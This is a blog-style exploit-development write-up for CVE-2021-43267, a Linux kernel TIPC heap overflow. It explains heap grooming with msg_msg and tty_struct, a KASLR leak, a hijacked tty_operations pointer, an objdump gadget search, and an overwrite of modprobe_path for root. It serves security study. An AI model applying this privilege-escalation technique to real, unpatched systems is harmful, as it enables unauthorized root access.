Exploiting CVE-2021-43267


A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed write up about the bug on the SentinelLabs website.

It’s a pretty clear cut heap buffer overflow where we control the size and data of the overflow. I decided I wanted to embark on a small exploit development adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI).

If you came here to find novel new kernel exploitation strategies, you picked the wrong blogpost, sorry!


To quote the TIPC webpage:

Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don’t have to perform DNS lookups and worry about IP addresses? Where you don’t have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes?

Well.. I have not. But then again, I’m just an opportunistic vulndev person.

Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more.

Thanks for having me.

How to tipc-over-udp?

In order to use the TIPC support provided by the Linux kernel you’ll have to compile a kernel with TIPC enabled, or load the TIPC module which ships with many popular distributions. To easily interface with the TIPC subsystem you can use the tipc utility which is part of iproute2.

For example, to list all the node links you can issue tipc link list. We want to talk to the TIPC subsystem over UDP, and for that we’ll have to enable the UDP bearer media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>.

Under the hood the tipc userland utility uses netlink messages (using address family AF_TIPC) to do its thing. Interestingly enough, these netlink messages can be sent by any unprivileged user. So even if there’s no existing TIPC configuration in place, this bug can still be exploited.

How to reach the vulnerable code path?

So now we know how to enable the UDP listener for TIPC, how do we go about actually reaching the vulnerable code? We’ll have to present ourselves as a valid node and establish a link before we can trigger the MSG_CRYPTO code path. We can find a protocol specification on the TIPC webpage that details everything about transport, addressing schemes, fragmentation and so on.

That’s a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and with some hand-waving and reading the kernel source narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in.

In short, a typical TIPC datagram starts with a header, that consist out of at least six 32bit words in big endian byte order. Those are typically referred to as w0 through w5. This header is (optionally) followed by a payload. w0 encodes the TIPC version, header size, payload size, the message ‘protocol’. There’s also a flag which indicates whether this is a sequential message or not.

w1 encodes (among other things) a protocol message type specific to the protocol.

The header also specifies a node_id in w3 which is a unique identifier a node includes in every packet. Typically, nodes encode their IPv4 address to be their node_id.

A quick way to learn about the various bit fields of the header format is by consulting net/tipc/msg.h.

To establish a valid node link we send three packets:

protocol: LINK_CONFIG   -> message type: DSC_REQ_MSG
protocol: LINK_PROTOCOL -> message type: RESET_MSG
protocol: LINK_PROTOCOL -> message type: STATE_MSG

The LINK_CONFIG packet will advertise ourselves. The link is then reset with the LINK_PROTOCOL packet that has the RESET_MSG message type. Finally, the link is brought up by sending a LINK_PROTOCOL packet with the STATE_MSG message type.

Now we are actually in a state where we can send MSG_CRYPTO TIPC packets and start playing with the heap overflow bug.

Corrupting some memories

A MSG_CRYPTO TIPC packet payload looks like this:

struct tipc_aead_key {
    char alg_name[TIPC_AEAD_ALG_NAME];
    unsigned int keylen;
    char key[];

As detailed in the SentinelLabs write up, the length of the kmalloc’d heap buffer is determined by taking the payload size from the TIPC packet header. After which the key is memcpy’d into this buffer with the length specified in the MSG_CRYPTO structure.

At first you’d think that means the overflow uses uncontrolled data.. but you can send TIPC packets that lie about the actual length of the payload (by making tipc_hdr.payload_size smaller than the actual payload size). This passes all the checks and reaches the memcpy without the remainder of the payload being discarded, giving us full control over the overflowed data. Great!

The length specified in keylen will be passed to kmalloc directly.

Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc end up in caches that are grouped by size (powers of two). You can have a peep at /proc/slabinfo and look at the entries prefixed by kmalloc- to get an overview of the general purpose object cache sizes.

Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size!

Defeating KASLR

If we want to do any kind of control flow hijacking we’re going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address.

It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow.

While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties “Elastic Objects”. Their research on the subject is quite exhaustive and covers Linux, BSD and XNU.. I definitley recommend checking it out.

Since we can pick arbitrarily sized allocations, we’re free to target any convenient elastic object. I went with msg_msg, which is popular choice amongst fellow exploitdevs. ;-)

The structure of a msg_msg as defined in include/linux/msg.h:

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */

You can easily allocate msg_msg objects using the msgsnd system call. And they can be freed again using the msgrcv system call. These system calls are not to be confused with the sendmsg and recvmsg system calls btw, great naming scheme!

If we corrupt the m_ts field of a msg_msg object we can extend its size and get a relative kernel heap out-of-bounds read back to userland when retrieving the message from the queue again using the msgrcv system call.

A small problem with this is that overwriting the m_ts field also requires trampling over the struct list_head members (a prev/next pointer). When msgrcv is called and a matching message is found, it wants to unlink it from the linked list.. but since we’re still in the information leak stage of the exploit, we can’t put any legitimate/meaningful pointers in there. Luckily, there’s a flag you can pass to msgrcv called MSG_COPY, which will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference.

So the basic strategy is to line up three objects like this:


and proceed to free the first msg_msg object and allocate the MSG_CRYPTO key buffer into the hole it left behind. We corrupt the adjacent msg_msg using the buffer overflow and subsequently leak data from some_interesting_object using the msgrcv system call with the MSG_COPY flag set.

I chose to leak the data of tty_struct, which can easily be allocated by open()‘ing /dev/ptmx. This tty_struct holds all kinds of state related to the tty, and starts off like this:

struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev; /* class device or NULL (e.g. ptys, serdev) */
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;

A nice feature of this structure is the magic at the very start, it allows us to easily confirm the validity of our leak by comparing it against the expected value TTY_MAGIC (0x5401). A few members later we find struct tty_operations *ops which points to a list of function pointers associated with various operations. This points to somewhere in kernel .data, and thus we can use it to defeat KASLR!

Depending on whether the tty_struct being leaked belongs to a master pty or slave pty (they are allocated in pairs) we’ll end up finding the address of ptm_unix98_ops or pty_unix98_ops.

As an added bonus, leaking tty_struct also allows us to figure out the address of the tty_struct because tty_struct.ldisc_sem.read_wait.next points to itself!

Getting $RIP (or panic tryin’)

Naturally, the tty_operations pointer is a nice target for overwriting to hijack the kernel execution flow. So in the next stage of the exploit we start by spraying a bunch of copies of a fake tty_operations table. We can accurately guesstimate the address of one of these sprayed copies by utilizing the heap pointer we leaked in the previous step.

Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger TIPC bug to (hopefully) overflow into a tty_struct. To confirm we actually overwrote (the first part) of a tty_struct we invoke ioctl on the fd we got from opening /dev/ptmx, this will call tty_struct.ops.ioctl and should get us control over $RIP if we managed to hijack the ops pointer of this object. If its not the case, we close() the pty again to not exhaust resources.

Avoiding ROP (mostly)

Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it.. but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened.

If we look at the prototype of the ioctl callback from the ops list, we see:

int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

We can set both cmd and arg from the userland invocation easily!

So effectively we have an arbitrary function call where we control the 2nd and 3rd argument (RSI and RDX respectively). Well, cmd is actually truncated to 32bit, but that’s good enough.

Let’s try to look for some gadget sequence that allows us to do an arbitrary write:

$ objdump -D -j .text ./vmlinux \
    | grep -C1 'mov    %rsi,(%rdx)' \
    | grep -B2 ret
ffffffff812c51f5:       31 c0                   xor    %eax,%eax
ffffffff812c51f7:       48 89 32                mov    %rsi,(%rdx)
ffffffff812c51fa:       c3                      ret

This one is convenient, it also clears rax so the exploit can tell whether the invocation was a success. We now have some arbitrary 64bit write gadget! (For some definition of arbitrary, the value is always 32bit controlled + 32bit zeroes, but whatever)

Meet my friend: modprobe_path

Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, what do we overwrite? Classic kernel exploits would target the cred structure of the current task to elevate the privileges to uid0. We could of course build an arbitrary read mechanism in the same way we build the arbitrary write.. but lets try something else.

There are various scenarios in which the kernel will spawn a userland process (using the usermode_helper infrastructure in the kernel) to load additional kernel modules when it thinks that is necessary. The process spawned to load these modules is, of course: modprobe. The path to the modprobe binary is stored in a global variable called modprobe_path and this can be set by a privileged user through the sysfs node /proc/sys/kernel/modprobe.

This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel we need some additional module support we can invoke any executable as root!

One of these modprobe scenarios is when you try to run a binary that has no known magic, in fs/exec.c we see:

 * cycle the list of binary formats handler, until one recognizes the image
static int search_binary_handler(struct linux_binprm *bprm)
    if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)

request_module ends up invoking call_modprobe which spawns a modprobe process based on the path from modprobe_path.

Closing Words

I hope you enjoyed the read. Feel free to reach out to point out any inaccuracies or feedback. The full exploit code can be found here

A succesful run of the exploit should look something like this:

PoC in action